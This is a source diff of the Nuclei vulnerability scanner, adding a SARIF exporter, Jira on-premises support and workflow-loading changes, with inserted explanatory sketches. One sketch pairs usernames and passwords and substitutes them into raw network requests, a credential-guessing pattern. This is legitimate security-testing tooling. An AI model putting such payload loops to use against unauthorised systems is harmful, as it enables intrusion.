matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test-header"], "could not get correct resp for header") @@ -191,7 +191,7 @@ func TestHTTPMakeResult(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") diff --git a/v2/pkg/reporting/exporters/disk/disk.go b/v2/pkg/reporting/exporters/disk/disk.go 
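The network protocol changes above add payload support: each set of values produced by the generator is substituted into the raw request data by the expression engine before being written to the connection, and internal extractors can feed newly found values back into the payload map. A rough stdlib-only sketch of that substitute-and-send loop; the simple `{{name}}` replacement stands in for nuclei's expression evaluation, and the positional pairing of lists mimics a pitchfork-style attack:

```go
package main

import (
	"fmt"
	"strings"
)

// evaluate substitutes {{key}} markers in the raw request data with payload
// values; it stands in for nuclei's expression evaluation on network input.
func evaluate(data string, payload map[string]string) string {
	for k, v := range payload {
		data = strings.ReplaceAll(data, "{{"+k+"}}", v)
	}
	return data
}

func main() {
	rawInput := "USER {{username}}\r\nPASS {{password}}\r\n"

	// Pitchfork-style pairing: values are taken positionally from each list.
	usernames := []string{"admin", "guest"}
	passwords := []string{"admin123", "guest"}

	for i := range usernames {
		payload := map[string]string{
			"username": usernames[i],
			"password": passwords[i],
		}
		// In the real protocol this buffer is written to the TCP/TLS
		// connection; here we only print what would be sent.
		fmt.Printf("would send:\n%s\n", evaluate(rawInput, payload))
	}
}
```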
index 5884615e33..d29799a34d 100644 --- a/v2/pkg/reporting/exporters/disk/disk.go +++ b/v2/pkg/reporting/exporters/disk/disk.go @@ -58,3 +58,8 @@ func (i *Exporter) Export(event *output.ResultEvent) error { err := ioutil.WriteFile(filepath.Join(i.directory, finalFilename), data, 0644) return err } + +// Close closes the exporter after operation +func (i *Exporter) Close() error { + return nil +} diff --git a/v2/pkg/reporting/exporters/sarif/sarif.go b/v2/pkg/reporting/exporters/sarif/sarif.go new file mode 100644 index 0000000000..84c070b845 --- /dev/null +++ b/v2/pkg/reporting/exporters/sarif/sarif.go @@ -0,0 +1,143 @@ +package sarif + +import ( + "crypto/sha1" + "encoding/hex" + "os" + "path" + "strings" + "sync" + + "github.com/owenrumney/go-sarif/sarif" + "github.com/pkg/errors" + "github.com/projectdiscovery/nuclei/v2/pkg/output" + "github.com/projectdiscovery/nuclei/v2/pkg/reporting/format" +) + +// Exporter is an exporter for nuclei sarif output format. +type Exporter struct { + sarif *sarif.Report + run *sarif.Run + mutex *sync.Mutex + + home string + options *Options +} + +// Options contains the configuration options for sarif exporter client +type Options struct { + // File is the file to export found sarif result to + File string `yaml:"file"` +} + +// New creates a new disk exporter integration client based on options. +func New(options *Options) (*Exporter, error) { + report, err := sarif.New(sarif.Version210) + if err != nil { + return nil, errors.Wrap(err, "could not create sarif exporter") + } + + home, err := os.UserHomeDir() + if err != nil { + return nil, errors.Wrap(err, "could not get home dir") + } + templatePath := path.Join(home, "nuclei-templates") + + run := sarif.NewRun("nuclei", "https://github.com/projectdiscovery/nuclei") + return &Exporter{options: options, home: templatePath, sarif: report, run: run, mutex: &sync.Mutex{}}, nil +} + +// Export exports a passed result event to sarif structure +func (i *Exporter) Export(event *output.ResultEvent) error { + templatePath := strings.TrimPrefix(event.TemplatePath, i.home) + + h := sha1.New() + h.Write([]byte(event.Host)) + templateID := event.TemplateID + "-" + hex.EncodeToString(h.Sum(nil)) + + fullDescription := format.MarkdownDescription(event) + sarifSeverity := getSarifSeverity(event) + + var ruleName string + if s, ok := event.Info["name"]; ok { + ruleName = s.(string) + } + + var templateURL string + if strings.HasPrefix(event.TemplatePath, i.home) { + templateURL = "https://github.com/projectdiscovery/nuclei-templates/blob/master" + templatePath + } else { + templateURL = "https://github.com/projectdiscovery/nuclei-templates" + } + + var ruleDescription string + if d, ok := event.Info["description"]; ok { + ruleDescription = d.(string) + } + + i.mutex.Lock() + defer i.mutex.Unlock() + + _ = i.run.AddRule(templateID). + WithDescription(ruleName). + WithHelp(fullDescription). + WithHelpURI(templateURL). + WithFullDescription(sarif.NewMultiformatMessageString(ruleDescription)) + result := i.run.AddResult(templateID). + WithMessage(sarif.NewMessage().WithText(event.Host)). + WithLevel(sarifSeverity) + + // Also write file match metadata to file + if event.Type == "file" && (event.FileToIndexPosition != nil && len(event.FileToIndexPosition) > 0) { + for file, line := range event.FileToIndexPosition { + result.WithLocation(sarif.NewLocation().WithMessage(sarif.NewMessage().WithText(ruleName)).WithPhysicalLocation( + sarif.NewPhysicalLocation(). + WithArtifactLocation(sarif.NewArtifactLocation().WithUri(file)). 
+ WithRegion(sarif.NewRegion().WithStartColumn(1).WithStartLine(line).WithEndLine(line).WithEndColumn(32)), + )) + } + } else { + result.WithLocation(sarif.NewLocation().WithMessage(sarif.NewMessage().WithText(event.Host)).WithPhysicalLocation( + sarif.NewPhysicalLocation(). + WithArtifactLocation(sarif.NewArtifactLocation().WithUri("README.md")). + WithRegion(sarif.NewRegion().WithStartColumn(1).WithStartLine(1).WithEndLine(1).WithEndColumn(1)), + )) + } + return nil +} + +// getSarifSeverity returns the sarif severity +func getSarifSeverity(event *output.ResultEvent) string { + var ruleSeverity string + if s, ok := event.Info["severity"]; ok { + ruleSeverity = s.(string) + } + + switch ruleSeverity { + case "info": + return "note" + case "low", "medium": + return "warning" + case "high", "critical": + return "error" + default: + return "note" + } +} + +// Close closes the exporter after operation +func (i *Exporter) Close() error { + i.mutex.Lock() + defer i.mutex.Unlock() + + i.sarif.AddRun(i.run) + if len(i.run.Results) == 0 { + return nil // do not write when no results + } + file, err := os.Create(i.options.File) + if err != nil { + return errors.Wrap(err, "could not create sarif output file") + } + defer file.Close() + return i.sarif.Write(file) +} diff --git a/v2/pkg/reporting/format/format.go b/v2/pkg/reporting/format/format.go index 153b6c24ce..ec09979555 100644 --- a/v2/pkg/reporting/format/format.go +++ b/v2/pkg/reporting/format/format.go @@ -44,6 +44,9 @@ func MarkdownDescription(event *output.ResultEvent) string { builder.WriteString(event.Timestamp.Format("Mon Jan 2 15:04:05 -0700 MST 2006")) builder.WriteString("\n\n**Template Information**\n\n| Key | Value |\n|---|---|\n") for k, v := range event.Info { + if k == "reference" { + continue + } builder.WriteString(fmt.Sprintf("| %s | %s |\n", k, v)) } if event.Request != "" { @@ -60,11 +63,11 @@ func MarkdownDescription(event *output.ResultEvent) string { } else { builder.WriteString(event.Response) } - builder.WriteString("\n```\n\n") + builder.WriteString("\n```\n") } if len(event.ExtractedResults) > 0 || len(event.Metadata) > 0 { - builder.WriteString("**Extra Information**\n\n") + builder.WriteString("\n**Extra Information**\n\n") if len(event.ExtractedResults) > 0 { builder.WriteString("**Extracted results**:\n\n") for _, v := range event.ExtractedResults { @@ -110,6 +113,26 @@ func MarkdownDescription(event *output.ResultEvent) string { builder.WriteString("\n```\n") } } + if d, ok := event.Info["reference"]; ok { + builder.WriteString("\nReference: \n") + + switch v := d.(type) { + case string: + if !strings.HasPrefix(v, "-") { + builder.WriteString("- ") + } + builder.WriteString(v) + case []interface{}: + slice := types.ToStringSlice(v) + for i, item := range slice { + builder.WriteString("- ") + builder.WriteString(item) + if len(slice)-1 != i { + builder.WriteString("\n") + } + } + } + } builder.WriteString("\n---\nGenerated by [Nuclei](https://github.com/projectdiscovery/nuclei)") data := builder.String() diff --git a/v2/pkg/reporting/reporting.go b/v2/pkg/reporting/reporting.go index e33600bb04..22415ae3b5 100644 --- a/v2/pkg/reporting/reporting.go +++ b/v2/pkg/reporting/reporting.go @@ -7,6 +7,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/dedupe" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/disk" + "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/sarif" 
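The new sarif exporter above drives the owenrumney/go-sarif builder API: one rule per template, one result per finding, all collected into a single run that is written out when the exporter is closed. A trimmed standalone sketch of that lifecycle, restricted to calls that appear in the exporter; the rule ID, message text, and output filename are placeholders:

```go
package main

import (
	"log"
	"os"

	"github.com/owenrumney/go-sarif/sarif"
)

func main() {
	// Empty SARIF 2.1.0 report plus one run describing the tool.
	report, err := sarif.New(sarif.Version210)
	if err != nil {
		log.Fatal(err)
	}
	run := sarif.NewRun("nuclei", "https://github.com/projectdiscovery/nuclei")

	// One rule per template and one result per finding.
	_ = run.AddRule("example-template-id").
		WithDescription("Example finding").
		WithHelpURI("https://github.com/projectdiscovery/nuclei-templates")
	run.AddResult("example-template-id").
		WithMessage(sarif.NewMessage().WithText("https://example.com")).
		WithLevel("warning").
		WithLocation(sarif.NewLocation().
			WithMessage(sarif.NewMessage().WithText("Example finding")).
			WithPhysicalLocation(sarif.NewPhysicalLocation().
				WithArtifactLocation(sarif.NewArtifactLocation().WithUri("README.md")).
				WithRegion(sarif.NewRegion().WithStartLine(1).WithStartColumn(1).WithEndLine(1).WithEndColumn(1))))

	report.AddRun(run)

	file, err := os.Create("nuclei-results.sarif")
	if err != nil {
		log.Fatal(err)
	}
	defer file.Close()
	if err := report.Write(file); err != nil {
		log.Fatal(err)
	}
}
```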
"github.com/projectdiscovery/nuclei/v2/pkg/reporting/trackers/github" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/trackers/gitlab" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/trackers/jira" @@ -28,6 +29,8 @@ type Options struct { Jira *jira.Options `yaml:"jira"` // DiskExporter contains configuration options for Disk Exporter Module DiskExporter *disk.Options `yaml:"disk"` + // SarifExporter contains configuration options for Sarif Exporter Module + SarifExporter *sarif.Options `yaml:"sarif"` } // Filter filters the received event and decides whether to perform @@ -79,6 +82,8 @@ type Tracker interface { // Exporter is an interface implemented by an issue exporter type Exporter interface { + // Close closes the exporter after operation + Close() error // Export exports an issue to an exporter Export(event *output.ResultEvent) error } @@ -93,6 +98,10 @@ type Client struct { // New creates a new nuclei issue tracker reporting client func New(options *Options, db string) (*Client, error) { + if options == nil { + return nil, errors.New("no options passed") + } + if options.AllowList != nil { options.AllowList.Compile() } @@ -129,6 +138,14 @@ func New(options *Options, db string) (*Client, error) { } client.exporters = append(client.exporters, exporter) } + if options.SarifExporter != nil { + exporter, err := sarif.New(options.SarifExporter) + if err != nil { + return nil, errors.Wrap(err, "could not create exporting client") + } + client.exporters = append(client.exporters, exporter) + } + storage, err := dedupe.New(db) if err != nil { return nil, err @@ -137,9 +154,22 @@ func New(options *Options, db string) (*Client, error) { return client, nil } +// RegisterTracker registers a custom tracker to the reporter +func (c *Client) RegisterTracker(tracker Tracker) { + c.trackers = append(c.trackers, tracker) +} + +// RegisterExporter registers a custom exporter to the reporter +func (c *Client) RegisterExporter(exporter Exporter) { + c.exporters = append(c.exporters, exporter) +} + // Close closes the issue tracker reporting client func (c *Client) Close() { c.dedupe.Close() + for _, exporter := range c.exporters { + exporter.Close() + } } // CreateIssue creates an issue in the tracker diff --git a/v2/pkg/reporting/trackers/jira/jira.go b/v2/pkg/reporting/trackers/jira/jira.go index 0c68b4ce37..5a56ed9e33 100644 --- a/v2/pkg/reporting/trackers/jira/jira.go +++ b/v2/pkg/reporting/trackers/jira/jira.go @@ -20,6 +20,8 @@ type Integration struct { // Options contains the configuration options for jira client type Options struct { + // Cloud value is set to true when Jira cloud is used + Cloud bool `yaml:"cloud"` // URL is the URL of the jira server URL string `yaml:"url"` // AccountID is the accountID of the jira user. @@ -36,8 +38,12 @@ type Options struct { // New creates a new issue tracker integration client based on options. 
func New(options *Options) (*Integration, error) { + username := options.Email + if !options.Cloud { + username = options.AccountID + } tp := jira.BasicAuthTransport{ - Username: options.Email, + Username: username, Password: options.Token, } jiraClient, err := jira.NewClient(tp.Client(), options.URL) @@ -51,15 +57,27 @@ func New(options *Options) (*Integration, error) { func (i *Integration) CreateIssue(event *output.ResultEvent) error { summary := format.Summary(event) - issueData := &jira.Issue{ - Fields: &jira.IssueFields{ - Assignee: &jira.User{AccountID: i.options.AccountID}, - Reporter: &jira.User{AccountID: i.options.AccountID}, + fields := &jira.IssueFields{ + Assignee: &jira.User{AccountID: i.options.AccountID}, + Reporter: &jira.User{AccountID: i.options.AccountID}, + Description: jiraFormatDescription(event), + Type: jira.IssueType{Name: i.options.IssueType}, + Project: jira.Project{Key: i.options.ProjectName}, + Summary: summary, + } + // On-prem version of Jira server does not use AccountID + if !i.options.Cloud { + fields = &jira.IssueFields{ + Assignee: &jira.User{Name: i.options.AccountID}, Description: jiraFormatDescription(event), Type: jira.IssueType{Name: i.options.IssueType}, Project: jira.Project{Key: i.options.ProjectName}, Summary: summary, - }, + } + } + + issueData := &jira.Issue{ + Fields: fields, } _, resp, err := i.jira.Issue.Create(issueData) if err != nil { @@ -92,6 +110,9 @@ func jiraFormatDescription(event *output.ResultEvent) string { builder.WriteString(event.Timestamp.Format("Mon Jan 2 15:04:05 -0700 MST 2006")) builder.WriteString("\n\n*Template Information*\n\n| Key | Value |\n") for k, v := range event.Info { + if k == "reference" { + continue + } builder.WriteString(fmt.Sprintf("| %s | %s |\n", k, v)) } builder.WriteString("\n*Request*\n\n{code}\n") @@ -107,7 +128,7 @@ func jiraFormatDescription(event *output.ResultEvent) string { builder.WriteString("\n{code}\n\n") if len(event.ExtractedResults) > 0 || len(event.Metadata) > 0 { - builder.WriteString("*Extra Information*\n\n") + builder.WriteString("\n*Extra Information*\n\n") if len(event.ExtractedResults) > 0 { builder.WriteString("*Extracted results*:\n\n") for _, v := range event.ExtractedResults { @@ -153,6 +174,26 @@ func jiraFormatDescription(event *output.ResultEvent) string { builder.WriteString("\n{code}\n") } } + if d, ok := event.Info["reference"]; ok { + builder.WriteString("\nReference: \n") + + switch v := d.(type) { + case string: + if !strings.HasPrefix(v, "-") { + builder.WriteString("- ") + } + builder.WriteString(v) + case []interface{}: + slice := types.ToStringSlice(v) + for i, item := range slice { + builder.WriteString("- ") + builder.WriteString(item) + if len(slice)-1 != i { + builder.WriteString("\n") + } + } + } + } builder.WriteString("\n---\nGenerated by [Nuclei|https://github.com/projectdiscovery/nuclei]") data := builder.String() return data diff --git a/v2/pkg/templates/compile.go b/v2/pkg/templates/compile.go index ede72bb416..f883101347 100644 --- a/v2/pkg/templates/compile.go +++ b/v2/pkg/templates/compile.go @@ -12,14 +12,13 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/protocols" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/offlinehttp" - "github.com/projectdiscovery/nuclei/v2/pkg/types" - "github.com/projectdiscovery/nuclei/v2/pkg/workflows" + "github.com/projectdiscovery/nuclei/v2/pkg/workflows/compile" "gopkg.in/yaml.v2" ) // Parse parses a yaml request template file 
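templates.Parse, shown in the hunk that follows, now accepts a Preprocessor whose Process output replaces the raw template bytes before YAML decoding. A hypothetical preprocessor illustrating that hook; it assumes only the Process([]byte) []byte contract visible at the call site, and the {{env:NAME}} marker syntax is invented for this example:

```go
package main

import (
	"fmt"
	"os"
	"regexp"
)

// envPreprocessor expands {{env:NAME}} markers in raw template bytes before
// the YAML is decoded; it relies only on the Process([]byte) []byte contract
// that Parse invokes in the hunk below.
type envPreprocessor struct {
	re *regexp.Regexp
}

func newEnvPreprocessor() *envPreprocessor {
	return &envPreprocessor{re: regexp.MustCompile(`\{\{env:([A-Za-z_][A-Za-z0-9_]*)\}\}`)}
}

// Process replaces each marker with the value of the referenced variable.
func (p *envPreprocessor) Process(data []byte) []byte {
	return p.re.ReplaceAllFunc(data, func(match []byte) []byte {
		name := p.re.FindSubmatch(match)[1]
		return []byte(os.Getenv(string(name)))
	})
}

func main() {
	os.Setenv("API_TOKEN", "s3cr3t")
	template := []byte("headers:\n  Authorization: Bearer {{env:API_TOKEN}}\n")
	fmt.Print(string(newEnvPreprocessor().Process(template)))
	// headers:
	//   Authorization: Bearer s3cr3t
}
```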
//nolint:gocritic // this cannot be passed by pointer -func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error) { +func Parse(filePath string, preprocessor Preprocessor, options protocols.ExecuterOptions) (*Template, error) { template := &Template{} f, err := os.Open(filePath) @@ -34,6 +33,10 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error } data = template.expandPreprocessors(data) + if preprocessor != nil { + data = preprocessor.Process(data) + } + err = yaml.NewDecoder(bytes.NewReader(data)).Decode(template) if err != nil { return nil, err @@ -45,22 +48,6 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error if _, ok := template.Info["author"]; !ok { return nil, errors.New("no template author field provided") } - templateTags, ok := template.Info["tags"] - if !ok { - templateTags = "" - } - matchWithTags := false - if len(options.Options.Tags) > 0 { - if err := matchTemplateWithTags(types.ToString(templateTags), types.ToString(template.Info["severity"]), options.Options.Tags); err != nil { - return nil, fmt.Errorf("tags filter not matched %s", templateTags) - } - matchWithTags = true - } - if len(options.Options.ExcludeTags) > 0 && !matchWithTags { - if err := matchTemplateWithTags(types.ToString(templateTags), types.ToString(template.Info["severity"]), options.Options.ExcludeTags); err == nil { - return nil, fmt.Errorf("exclude-tags filter matched %s", templateTags) - } - } // Setting up variables regarding template metadata options.TemplateID = template.ID @@ -80,9 +67,12 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error // Compile the workflow request if len(template.Workflows) > 0 { compiled := &template.Workflow - if err := template.compileWorkflow(&options, compiled); err != nil { - return nil, errors.Wrap(err, "could not compile workflow") + + loader, err := compile.NewLoader(&options) + if err != nil { + return nil, errors.Wrap(err, "could not create workflow loader") } + compileWorkflow(preprocessor, &options, compiled, loader) template.CompiledWorkflow = compiled template.CompiledWorkflow.Options = &options } @@ -147,112 +137,6 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error if template.Executer == nil && template.CompiledWorkflow == nil && template.Code == "" { return nil, errors.New("cannot create template executer") } + template.Path = filePath return template, nil } - -// compileWorkflow compiles the workflow for execution -func (t *Template) compileWorkflow(options *protocols.ExecuterOptions, workflow *workflows.Workflow) error { - for _, workflow := range workflow.Workflows { - if err := t.parseWorkflow(workflow, options); err != nil { - return err - } - } - return nil -} - -// parseWorkflow parses and compiles all templates in a workflow recursively -func (t *Template) parseWorkflow(workflow *workflows.WorkflowTemplate, options *protocols.ExecuterOptions) error { - if err := t.parseWorkflowTemplate(workflow, options); err != nil { - return err - } - for _, subtemplates := range workflow.Subtemplates { - if err := t.parseWorkflow(subtemplates, options); err != nil { - return err - } - } - for _, matcher := range workflow.Matchers { - for _, subtemplates := range matcher.Subtemplates { - if err := t.parseWorkflow(subtemplates, options); err != nil { - return err - } - } - } - return nil -} - -// parseWorkflowTemplate parses a workflow template creating an executer -func (t *Template) parseWorkflowTemplate(workflow 
*workflows.WorkflowTemplate, options *protocols.ExecuterOptions) error { - paths, err := options.Catalog.GetTemplatePath(workflow.Template) - if err != nil { - return errors.Wrap(err, "could not get workflow template") - } - for _, path := range paths { - opts := protocols.ExecuterOptions{ - Output: options.Output, - Options: options.Options, - Progress: options.Progress, - Catalog: options.Catalog, - RateLimiter: options.RateLimiter, - IssuesClient: options.IssuesClient, - ProjectFile: options.ProjectFile, - } - template, err := Parse(path, opts) - if err != nil { - return errors.Wrap(err, "could not parse workflow template") - } - if template.Executer == nil { - return errors.New("no executer found for template") - } - workflow.Executers = append(workflow.Executers, &workflows.ProtocolExecuterPair{ - Executer: template.Executer, - Options: options, - }) - } - return nil -} - -// matchTemplateWithTags matches if the template matches a tag -func matchTemplateWithTags(tags, severity string, tagsInput []string) error { - actualTags := strings.Split(tags, ",") - if severity != "" { - actualTags = append(actualTags, severity) // also add severity to tag - } - - matched := false -mainLoop: - for _, t := range tagsInput { - commaTags := strings.Split(t, ",") - for _, tag := range commaTags { - tag = strings.TrimSpace(tag) - key, value := getKeyValue(tag) - - for _, templTag := range actualTags { - templTag = strings.TrimSpace(templTag) - tKey, tValue := getKeyValue(templTag) - - if strings.EqualFold(key, tKey) && strings.EqualFold(value, tValue) { - matched = true - break mainLoop - } - } - } - } - if !matched { - return errors.New("could not match template tags with input") - } - return nil -} - -// getKeyValue returns key value pair for a data string -func getKeyValue(data string) (key, value string) { - if strings.Contains(data, ":") { - parts := strings.SplitN(data, ":", 2) - if len(parts) == 2 { - key, value = parts[0], parts[1] - } - } - if value == "" { - value = data - } - return key, value -} diff --git a/v2/pkg/templates/compile_test.go b/v2/pkg/templates/compile_test.go deleted file mode 100644 index 6ce605f7a2..0000000000 --- a/v2/pkg/templates/compile_test.go +++ /dev/null @@ -1,41 +0,0 @@ -package templates - -import ( - "testing" - - "github.com/stretchr/testify/require" -) - -func TestMatchTemplateWithTags(t *testing.T) { - err := matchTemplateWithTags("php,linux,symfony", "", []string{"php"}) - require.Nil(t, err, "could not get php tag from input slice") - - err = matchTemplateWithTags("lang:php,os:linux,cms:symfony", "", []string{"cms:symfony"}) - require.Nil(t, err, "could not get php tag from input key value") - - err = matchTemplateWithTags("lang:php,os:linux,symfony", "", []string{"cms:symfony"}) - require.NotNil(t, err, "could get key value tag from input key value") - - err = matchTemplateWithTags("lang:php,os:linux,cms:jira", "", []string{"cms:symfony"}) - require.NotNil(t, err, "could get key value tag from input key value") - - t.Run("space", func(t *testing.T) { - err = matchTemplateWithTags("lang:php, os:linux, cms:symfony", "", []string{"cms:symfony"}) - require.Nil(t, err, "could get key value tag from input key value with space") - }) - - t.Run("comma-tags", func(t *testing.T) { - err = matchTemplateWithTags("lang:php,os:linux,cms:symfony", "", []string{"test,cms:symfony"}) - require.Nil(t, err, "could get key value tag from input key value with comma") - }) - - t.Run("severity", func(t *testing.T) { - err = matchTemplateWithTags("lang:php,os:linux,cms:symfony", 
"low", []string{"low"}) - require.Nil(t, err, "could get key value tag for severity") - }) - - t.Run("blank-tags", func(t *testing.T) { - err = matchTemplateWithTags("", "low", []string{"jira"}) - require.NotNil(t, err, "could get value tag for blank severity") - }) -} diff --git a/v2/pkg/templates/preprocessors.go b/v2/pkg/templates/preprocessors.go index 83241a0a58..ef6edeb1ca 100644 --- a/v2/pkg/templates/preprocessors.go +++ b/v2/pkg/templates/preprocessors.go @@ -8,6 +8,10 @@ import ( "github.com/segmentio/ksuid" ) +type Preprocessor interface { + Process(data []byte) []byte +} + var preprocessorRegex = regexp.MustCompile(`\{\{([a-z0-9_]+)\}\}`) // expandPreprocessors expands the pre-processors if any for a template data. diff --git a/v2/pkg/templates/templates.go b/v2/pkg/templates/templates.go index 3a6f476c06..4cadebda8a 100644 --- a/v2/pkg/templates/templates.go +++ b/v2/pkg/templates/templates.go @@ -39,4 +39,6 @@ type Template struct { TotalRequests int `yaml:"-" json:"-"` // Executer is the actual template executor for running template requests Executer protocols.Executer `yaml:"-" json:"-"` + + Path string `yaml:"-" json:"-"` } diff --git a/v2/pkg/templates/workflows.go b/v2/pkg/templates/workflows.go new file mode 100644 index 0000000000..628365d0a2 --- /dev/null +++ b/v2/pkg/templates/workflows.go @@ -0,0 +1,86 @@ +package templates + +import ( + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols" + "github.com/projectdiscovery/nuclei/v2/pkg/workflows" + "github.com/projectdiscovery/nuclei/v2/pkg/workflows/compile" +) + +// compileWorkflow compiles the workflow for execution +func compileWorkflow(preprocessor Preprocessor, options *protocols.ExecuterOptions, workflow *workflows.Workflow, loader compile.WorkflowLoader) { + for _, workflow := range workflow.Workflows { + if err := parseWorkflow(preprocessor, workflow, options, loader); err != nil { + gologger.Warning().Msgf("Could not parse workflow: %v\n", err) + continue + } + } +} + +// parseWorkflow parses and compiles all templates in a workflow recursively +func parseWorkflow(preprocessor Preprocessor, workflow *workflows.WorkflowTemplate, options *protocols.ExecuterOptions, loader compile.WorkflowLoader) error { + shouldNotValidate := false + + if len(workflow.Subtemplates) > 0 || len(workflow.Matchers) > 0 { + shouldNotValidate = true + } + if err := parseWorkflowTemplate(workflow, preprocessor, options, loader, shouldNotValidate); err != nil { + return err + } + for _, subtemplates := range workflow.Subtemplates { + if err := parseWorkflow(preprocessor, subtemplates, options, loader); err != nil { + gologger.Warning().Msgf("Could not parse workflow: %v\n", err) + continue + } + } + for _, matcher := range workflow.Matchers { + for _, subtemplates := range matcher.Subtemplates { + if err := parseWorkflow(preprocessor, subtemplates, options, loader); err != nil { + gologger.Warning().Msgf("Could not parse workflow: %v\n", err) + continue + } + } + } + return nil +} + +// parseWorkflowTemplate parses a workflow template creating an executer +func parseWorkflowTemplate(workflow *workflows.WorkflowTemplate, preprocessor Preprocessor, options *protocols.ExecuterOptions, loader compile.WorkflowLoader, noValidate bool) error { + var paths []string + + if len(workflow.Tags) > 0 { + paths = loader.ListTags([]string{workflow.Tags}) + } else { + paths = loader.ListTemplates([]string{workflow.Template}, noValidate) + } + if len(paths) == 0 { + return nil + } + for _, path := range paths { 
+ opts := protocols.ExecuterOptions{ + Output: options.Output, + Options: options.Options, + Progress: options.Progress, + Catalog: options.Catalog, + Browser: options.Browser, + RateLimiter: options.RateLimiter, + IssuesClient: options.IssuesClient, + Interactsh: options.Interactsh, + ProjectFile: options.ProjectFile, + } + template, err := Parse(path, preprocessor, opts) + if err != nil { + gologger.Warning().Msgf("Could not parse workflow template %s: %v\n", path, err) + continue + } + if template.Executer == nil { + gologger.Warning().Msgf("Could not parse workflow template %s: no executer found\n", path) + continue + } + workflow.Executers = append(workflow.Executers, &workflows.ProtocolExecuterPair{ + Executer: template.Executer, + Options: options, + }) + } + return nil +} diff --git a/v2/pkg/types/interfaces.go b/v2/pkg/types/interfaces.go index 6b0b40f638..4461ca6ea9 100644 --- a/v2/pkg/types/interfaces.go +++ b/v2/pkg/types/interfaces.go @@ -8,6 +8,23 @@ import ( "strings" ) +// JSONScalarToString converts an interface coming from json to string +// Inspired from: https://github.com/cli/cli/blob/09b09810dd812e3ede54b59ad9d6912b946ac6c5/pkg/export/template.go#L72 +func JSONScalarToString(input interface{}) (string, error) { + switch tt := input.(type) { + case string: + return ToString(tt), nil + case float64: + return ToString(tt), nil + case nil: + return ToString(tt), nil + case bool: + return ToString(tt), nil + default: + return "", fmt.Errorf("cannot convert type to string: %v", tt) + } +} + // ToString converts an interface to string in a quick way func ToString(data interface{}) string { switch s := data.(type) { diff --git a/v2/pkg/types/types.go b/v2/pkg/types/types.go index a68e9f9187..a3bf7cd807 100644 --- a/v2/pkg/types/types.go +++ b/v2/pkg/types/types.go @@ -7,9 +7,9 @@ type Options struct { // Tags contains a list of tags to execute templates for. Multiple paths // can be specified with -l flag and -tags can be used in combination with // the -l flag. - Tags goflags.StringSlice + Tags goflags.NormalizedStringSlice // ExcludeTags is the list of tags to exclude - ExcludeTags goflags.StringSlice + ExcludeTags goflags.NormalizedStringSlice // Workflows specifies any workflows to run by nuclei Workflows goflags.StringSlice // AdvancedWorkflows specifies any advanced workflows to run by nuclei @@ -24,18 +24,23 @@ type Options struct { // CustomHeaders is the list of custom global headers to send with each request. CustomHeaders goflags.StringSlice // Severity filters templates based on their severity and only run the matching ones. - Severity goflags.StringSlice + Severity goflags.NormalizedStringSlice + // Author filters templates based on their author and only run the matching ones. + Author goflags.NormalizedStringSlice + // IncludeTags includes specified tags to be run even while being in denylist + IncludeTags goflags.NormalizedStringSlice + // IncludeTemplates includes specified templates to be run even while being in denylist + IncludeTemplates goflags.StringSlice + InternalResolversList []string // normalized from resolvers flag as well as file provided. - // BurpCollaboratorBiid is the Burp Collaborator BIID for polling interactions. - BurpCollaboratorBiid string // ProjectPath allows nuclei to use a user defined project folder ProjectPath string // InteractshURL is the URL for the interactsh server. InteractshURL string - // Target is a single URL/Domain to scan using a template - Target string - // Targets specifies the targets to scan using templates. 
- Targets string + // Target URLs/Domains to scan using a template + Targets goflags.StringSlice + // TargetsFilePath specifies the targets from a file to scan using templates. + TargetsFilePath string // Output is the file to write found results to. Output string // ProxyURL is the URL for the proxy server @@ -52,6 +57,8 @@ type Options struct { ReportingConfig string // DiskExportDirectory is the directory to export reports in markdown on disk to DiskExportDirectory string + // SarifExport is the file to export sarif output format to + SarifExport string // ResolversFile is a file containing resolvers for nuclei. ResolversFile string // StatsInterval is the number of seconds to display stats after @@ -68,6 +75,8 @@ type Options struct { Retries int // Rate-Limit is the maximum number of requests per specified target RateLimit int + // Rate-Limit is the maximum number of requests per minute for specified target + RateLimitMinute int // PageTimeout is the maximum time to wait for a page in seconds PageTimeout int // InteractionsCacheSize is the number of interaction-url->req to keep in cache at a time. @@ -84,6 +93,8 @@ type Options struct { // using same matchers/extractors from http protocol without the need // to send a new request, reading responses from a file. OfflineHTTP bool + // StatsJSON writes stats output in JSON format + StatsJSON bool // Headless specifies whether to allow headless mode templates Headless bool // ShowBrowser specifies whether the show the browser in headless mode @@ -102,8 +113,11 @@ type Options struct { Silent bool // Version specifies if we should just show version and exit Version bool + // Validate validates the templates passed to nuclei. + Validate bool // Verbose flag indicates whether to show verbose output or not - Verbose bool + Verbose bool + VerboseVerbose bool // No-Color disables the colored output. 
